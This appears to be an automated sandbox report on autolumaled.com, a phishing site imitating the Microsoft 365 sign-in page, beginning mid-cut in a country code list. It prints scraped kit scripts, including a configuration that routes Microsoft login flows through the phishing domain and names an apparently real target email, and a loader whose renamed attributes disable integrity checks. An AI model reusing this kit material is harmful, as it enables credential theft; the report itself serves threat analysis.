Islands~692!!!MQ~Martinique~596!!!MR~Mauritania~222!!!MU~Mauritius~230!!!YT~Mayotte~262!!!MX~Mexico~52!!!FM~Micronesia~691!!!MD~Moldova~373!!!MC~Monaco~377!!!MN~Mongolia~976!!!ME~Montenegro~382!!!MS~Montserrat~1!!!MA~Morocco~212!!!MZ~Mozambique~258!!!MM~Myanmar~95!!!NA~Namibia~264!!!NR~Nauru~674!!!NP~Nepal~977!!!NL~Netherlands~31!!!NC~New Caledonia~687!!!NZ~New Zealand~64!!!NI~Nicaragua~505!!!NE~Niger~227!!!NG~Nigeria~234!!!NU~Niue~683!!!NF~Norfolk Island~672!!!KP~North Korea~850!!!MK~North Macedonia~389!!!MP~Northern Mariana Islands~1!!!NO~Norway~47!!!OM~Oman~968!!!PK~Pakistan~92!!!PW~Palau~680!!!PS~Palestinian Authority~970!!!PA~Panama~507!!!PG~Papua New Guinea~675!!!PY~Paraguay~595!!!PE~Peru~51!!!PH~Philippines~63!!!PL~Poland~48!!!PT~Portugal~351!!!PR~Puerto Rico~1!!!QA~Qatar~974!!!RE~Runion~262!!!RO~Romania~40!!!RU~Russia~7!!!RW~Rwanda~250!!!BL~Saint Barthlemy~590!!!KN~Saint Kitts and Nevis~1!!!LC~Saint Lucia~1!!!MF~Saint 
Martin~590!!!PM~Saint Pierre and Miquelon~508!!!VC~Saint Vin |
URL: https://outlook.office365.com/owa/prefetch.aspx... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a script for prefetching resources, likely for an Office 365 application. It does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or obfuscated code/URLs. The script is interacting with known, reputable domains (office365.com) and is likely performing legitimate analytics or telemetry functionality. While it uses some legacy practices like `XDomainRequest`, the overall risk is low, and the script seems to be a benign resource prefetching mechanism."
} |
/**
 * Resource prefetcher exposed as `pf.prefetch(cookieName, urls, fonts)`.
 *
 * After window load it requests each URL in turn through a
 * `<link rel="stylesheet">` element, then touches each font by appending a
 * transparent `<span>`. Every outcome is appended as a "1" or "0" digit to the
 * `p` field of a state object that is written back to the named cookie.
 *
 * Review notes:
 *  - Loading the module replaces `String.prototype.endsWith` with a version
 *    that builds a regular expression from its argument without escaping it.
 *  - The cookie is written with `path=/` only; no other attributes are set.
 */
var pf = (function () {
  let cookieName;
  let cookieValue;
  let resourceUrls;
  let fontNames;
  let state;
  let api;

  // Returns the value of the named cookie, or null when it is absent.
  function readCookie(name) {
    const prefix = name + "=";
    const entries = document.cookie.split(";");
    for (let k = 0; k < entries.length; ++k) {
      let entry = entries[k];
      while (entry.charAt(0) == " ") {
        entry = entry.substring(1, entry.length);
      }
      if (entry.indexOf(prefix) == 0) {
        return entry.substring(prefix.length, entry.length);
      }
    }
    return null;
  }

  // Stores name=value as a site-wide cookie.
  function writeCookie(name, value) {
    document.cookie = name + "=" + value + "; path=/";
  }

  // Parses "key:value&key:value" into an object that always starts with p:"".
  function parseState(serialized) {
    const parsed = { p: "" };
    const pairs = serialized.split("&");
    for (let k = 0; k < pairs.length; k++) {
      const pair = pairs[k].split(":");
      parsed[pair[0]] = pair[1];
    }
    return parsed;
  }

  // Inverse of parseState: "key:value&" for every enumerable key.
  function serializeState(obj) {
    let out = "";
    for (const key in obj) {
      out += key + ":" + obj[key] + "&";
    }
    return out;
  }

  // Appends one outcome digit to state.p and persists the state.
  function record(succeeded) {
    if (state) {
      state.p += succeeded ? "1" : "0";
      writeCookie(cookieName, serializeState(state));
    }
  }

  // Touches the font at `index`, then schedules the next one after 10 ms.
  function probeFont(index) {
    if (fontNames && index < fontNames.length) {
      const span = document.createElement("span");
      span.setAttribute("style", "font-family:'" + fontNames[index] + "';color:transparent;");
      span.innerText = "A";
      document.body.appendChild(span);
      record(true);
      setTimeout(function () {
        probeFont(index + 1);
      }, 10);
    }
  }

  // Requests the URL at `index`; moves on after load or error, calls `done` at the end.
  function loadResource(index, done) {
    if (resourceUrls && index < resourceUrls.length) {
      const url = resourceUrls[index];
      const link = document.createElement("link");
      link.setAttribute("href", url);
      link.setAttribute("rel", "stylesheet");
      link.onload = function () {
        record(true);
        loadResource(index + 1, done);
      };
      link.onerror = function () {
        record(false);
        loadResource(index + 1, done);
      };
      document.head.appendChild(link);
    } else {
      done();
    }
  }

  // Public entry point: remembers its inputs and defers the work to window load.
  function prefetch(name, urls, fonts) {
    cookieName = name;
    cookieValue = readCookie(cookieName);
    resourceUrls = urls;
    fontNames = fonts;
    if (cookieValue) {
      state = parseState(cookieValue);
    }
    window.onload = function () {
      loadResource(0, function () {
        probeFont(0);
      });
    };
  }

  String.prototype.endsWith = function (suffix) {
    return this.match(suffix + "$") == suffix;
  };
  state = {};
  api = {};
  api.prefetch = prefetch;
  return api;
})();
// Starts the prefetch: results are tracked in the "OWAPF" cookie, the seven
// r4.res.office365.com assets below are requested in order, and the
// 'office365icons' font is touched afterwards. Every asset, including the .js
// and .png entries, goes through the same <link rel="stylesheet"> path in pf.
pf.prefetch("OWAPF", ['https://r4.res.office365.com/owa/prem/15.20.8356.13/scripts/boot.worldwide.0.mouse.js','https://r4.res.office365.com/owa/prem/15.20.8356.13/scripts/boot.worldwide.1.mouse.js','https://r4.res.office365.com/owa/prem/15.20.8356.13/scripts/boot.worldwide.2.mouse.js','https://r4.res.office365.com/owa/prem/15.20.8356.13/scripts/boot.worldwide.3.mouse.js','https://r4.res.office365.com/owa/prem/15.20.8356.13/resources/images/0/sprite1.mouse.png','https://r4.res.office365.com/owa/prem/15.20.8356.13/resources/images/0/sprite1.mouse.css','https://r4.res.office365.com/owa/prem/15.20.8356.13/resources/styles/0/boot.worldwide.mouse.css'], ['office365icons']);
|
URL: https://autolumaled.com/aadcdn.msauth.net/~/shared... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This script appears to be a polyfill for the Promise API, which is a common and legitimate practice. It does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or obfuscation. The script is well-documented and licensed under the public domain, indicating it is likely a trusted and widely-used utility. While it uses some moderate-risk practices like external data transmission and fallback domains, these are common in modern web development and do not appear to be used for malicious purposes. Overall, this script poses a low risk and is likely a benign utility."
} |
/*!
* ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
*
* This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
*
* json2.js (2016-05-01)
* https://github.com/douglascrockford/JSON-js
* License: Public Domain
*
* Provided for Informational Purposes Only
*
* ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
*/!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)r=i[s],Object.prototype.hasOwnProperty.call(o,r)&&o[r]&&u.push(o[r][0]),o[r]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(c&&c(t);u.length;)u.shift()()}var n,r={},o={1:0};function i(t){if(r[t])return r[t].exports;var n=r[t]={i:t,l:!1,exports:{}};return e[t].call(n.exports,n,n.exports,i),n.l=!0,n.exports}Function.prototype.bind||(n=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var t=n.call(arguments,1),r=t.length,o=this,i=function(){},a=function(){return t.length=r,t.push.apply(t,arguments),o.apply(i.prototype.isPrototypeOf(this)?this:e,t)};return this.prototype&&(i.prototype=this.prototype),a.prototype=new i,a}),document.head=document.head||document.getElementsByTagName("head")[0],function(){function e(t){var n=this,r=0,o=null,i=[];function a(){if(i.length>0){var e=i.slice();i=[],setTimeout((function(){for(var t=0,n=e.length;t<n;++t)e[t]()}),0)}}function s(e){0===r&&(o=e,r=1,a())}function u(e){0===r&&(o=e,r=2,a())}n.then=function(t,n){return new e((function(s,u){!function(t,n,s,u){i.push((function(){var i;try{i=1===r?"function"==typeof t?t(o):o:"function"==typeof n?n(o):o}catch(a){return void u(a)}i instanceof e?i.then(s,u):2===r&&"function"!=typeof n?u(i):s(i)})),0!==r&&a()}(t,n,s,u)}))},n["catch"]=function(e){return n.then(null,e)},function(){if("function"!=typeof t)throw new TypeError("Promise: argument is not a Function object");try{t(s,u)}catch(e){u(e)}}()}function t(e,t,n,r,o){return function(i){e[t]=r?i:o?{status:"fulfilled",value:i}:{status:"rejected",reason:i},n()}}function n(n,r){return n&&n.length?new e((function(o,i){for(var a=[],s=0,u=0,c=n.length;u<c;++u){var l=n[u];if(l instanceof e){s++;var d=function(){0==--s&&o(a)};r?l.then(t(a,u,d,r),i):l.then(t(a,u,d,r,!0),t(a,u,d,r,!1))}else 
a[u]=l}0===s&&setTimeout((function(){o(a)}),0)})):e.resolve([])}function r(e,t){return function(){e(t)}}e.all=function(e){return n(e,!0)},e.allSettled=function(e){return n(e,!1)},e.race=function(t){return new e((function(n,o){if(t&&t.length)for(var i=0,a=t.length;i<a;++i){var s=t[i];s instanceof e?s.then(n,o):setTimeout(r(n,s),0)}}))},e.reject=function(t){return new e((function(e,n){n(t)}))},e.resolve=function(t){return t instanceof e?t:t&&"function"==typeof t.then?new e((function(e,n){t.then(e,n)})):new e((function(e){e(t)}))},window.Promise||(window.Promise=e),window.Promise.all||(window.Promise.all=e.all),window.Promise.allSettled||(window.Promise.allSettled=e.allSettled),window.Promise.race||(window.Promise.race=e.race),window.Promise.reject||(window.Promise.reject=e.reject),window.Promise.resolve||(window.Promise.resolve=e.resolve)}(),i.e=function(e){var t=[],n=o[e];if(0!==n)if(n)t.push(n[2]);else{var r=new Promise((function(t,r){n=o[e]=[t,r]}));t.push(n[2]=r);var a=window.ServerData,s=a&&a.loader&&a.loader.cdnRoots||[],u=a&&a.slMaxRetry?a.slMaxRetry:s.length-1,c=new Error;var l=function d(t,n){var |
URL: https://autolumaled.com/?2ryn4nn79=aHR0cHM6Ly9sb2d... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet contains several behaviors that raise moderate security concerns, including:
1. External Data Transmission (+2 points): The script sends user data to the 'autolumaled.com' domain, which is not a known trusted domain.
2. Fallback Domains (+2 points): The script uses multiple fallback domains, some of which may be untrusted.
3. Aggressive DOM Manipulation (+2 points): The script appears to aggressively manipulate the DOM, which could indicate potential malicious activity.
While the script does not contain any high-risk indicators like dynamic code execution or obfuscated code, the combination of the moderate-risk behaviors and the use of potentially untrusted domains results in a medium risk score of 6. Further investigation may be warranted to determine the legitimacy and intended purpose of this script."
} |
//<![CDATA[
$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://autolumaled.com/aadcdn.msauth.net/~/shared/1.0/","urlDefaultFavicon":"https://autolumaled.com/aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000\u0026redirect_uri=https%3a%2f%2fautolumaled.com%2fowa%2f\u0026resource=00000002-0000-0ff1-ce00-000000000000\u0026response_mode=form_post\u0026response_type=code+id_token\u0026scope=openid\u0026msafed=1\u0026msaredir=1\u0026login_hint=misty.alnahaoi%40texanacenter.com\u0026client-request-id=948a9117-40b6-3473-9757-3f49bb917ffb\u0026protectedtoken=true\u0026claims=%7b%22id_token%22%3a%7b%22xms_cc%22%3a%7b%22values%22%3a%5b%22CP1%22%5d%7d%7d%7d\u0026nononce=638725737240944157.7c370d18-7b0e-4e63-870c-dc1316649581\u0026state=DctBDsIgEEBR0LO4hA4wMHTReBQzUmJJWkiURHt7Wby_-1IIcR0ug4QRQcFFsp4cWYQZ0XjSlBzBaqKiJ2SFOTgVCZJak3EmBJx9NHK8dmpfnu57e5X62Erty1E-_dS8V964lRtCzz-unHLt-a1TO_4\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"urlReportPageLoad":"https://autolumaled.com/common/instrumentation/reportpageload?mkt=en-US","dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://autolumaled.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/sso?client-request-id=948a9117-40b6-3473-9757-3f49bb917ffb","iwaSsoProbeUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/ssoprobe?client-request-id=948a9117-40b6-3473-9757-3f49bb917ffb","iwaIFrameUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/ifram
e?client-request-id=948a9117-40b6-3473-9757-3f49bb917ffb\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://autologon.microsoftazuread-sso.com/common/winauth/sso/edgeredirect?client-request-id=948a9117-40b6-3473-9757-3f49bb917ffb\u0026origin=autolumaled.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fIsCiamUserFlowUxNewLogicEnabled":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fUseHighContrastDetectionMode":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"urlAcmaServerPath":"https://autolumaled.com/","sTenantId":"00000000-0000-0000-0000-000000000000","scid":1013,"hpgact":1800,"hpgid":6,"apiCanary":"PAQABDgEAAABVrSpeuWamRam2jAF1XRQExb9dkYTSL7qrVfOBcgHs1hv2T-ymLAvRJPbTzeAfGR33TkCb371dZ_R6Hg3drKHvJAMtwvrqOp0JS06byYTsz2aVpKsNKRSP06_A4m-DcjhYsfMxc507RhDUE46dQrCE5AZV0zxaW5bOntHKq2h94URe2P2Tb4b1Tqk4va-go1Nke6ATEiC0R2rros6phgQfkYSIYhoris6_85_EHK_-WyAA","canary":"D95c+z90zLBZ0tf/YrUjKxM+9WbtYAc1Qa2r16C4t8Q=3:1:CANARY:A6xe+dfqiiRDjaO0Ml3+l2Nl5O+QQLLIgOcWUvZDiDY=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"948a9117-40b6-3473-9757-3f49bb917ffb","sessionId":"22c9d7b5-19de-4944-8cdf-03d0dc726300","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you i |
URL: https://autolumaled.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false,
"reasoning": "This appears to be a straightforward commercial domain with a standard .com TLD. No suspicious elements are detected in the URL structure. This verdict considers the URL string only; the page-content analysis of the same domain later in this report identifies Microsoft branding and a password input field, so it should not be read as a clean result for the site."
} |
URL: https://autolumaled.com |
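URL: https://autolumaled.com/?2ryn4nn79=aHR0cHM6Ly9sb2d... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The script primarily involves DOM manipulation and logging, with no high-risk indicators like dynamic code execution or data exfiltration. It uses legacy practices and tracking behavior, but these are not inherently malicious. The script appears to be a debugging or logging utility, which aligns with typical analytics or telemetry functionality. Note for reviewers: the loader excerpt that follows sets the attributes 'rickorigin' and 'xintegrity' on the elements it creates, where the standard HTML attribute names are 'crossorigin' and 'integrity'. Browsers ignore unknown attributes, so Subresource Integrity is not enforced for those resources; this may indicate that the page markup was rewritten before delivery and is worth checking before accepting the low score."
} |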
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+v.length).toLowerCase()===v}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("rickorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("xintegrity",t)),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector("s |
URL: https://autolumaled.com/?2ryn4nn79=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291 Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Cancel",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://autolumaled.com/?2ryn4nn79=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291 Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://autolumaled.com/?2ryn4nn79=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291 Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://autolumaled.com/?2ryn4nn79=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291 Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://autolumaled.com/?2ryn4nn79=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291 Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://autolumaled.com/?2ryn4nn79=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291 Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://autolumaled.com/?2ryn4nn79=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291 Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The URL 'autolumaled.com' does not match the legitimate domain 'microsoft.com'.", "The domain name 'autolumaled.com' does not contain any recognizable association with Microsoft.", "The presence of a password input field on a non-Microsoft domain is suspicious.", "The URL does not contain any recognizable Microsoft branding or subdomains." ], "riskscore": 9}
Google indexed: False |
URL: autolumaled.com
Brands: Microsoft
Input Fields: Password |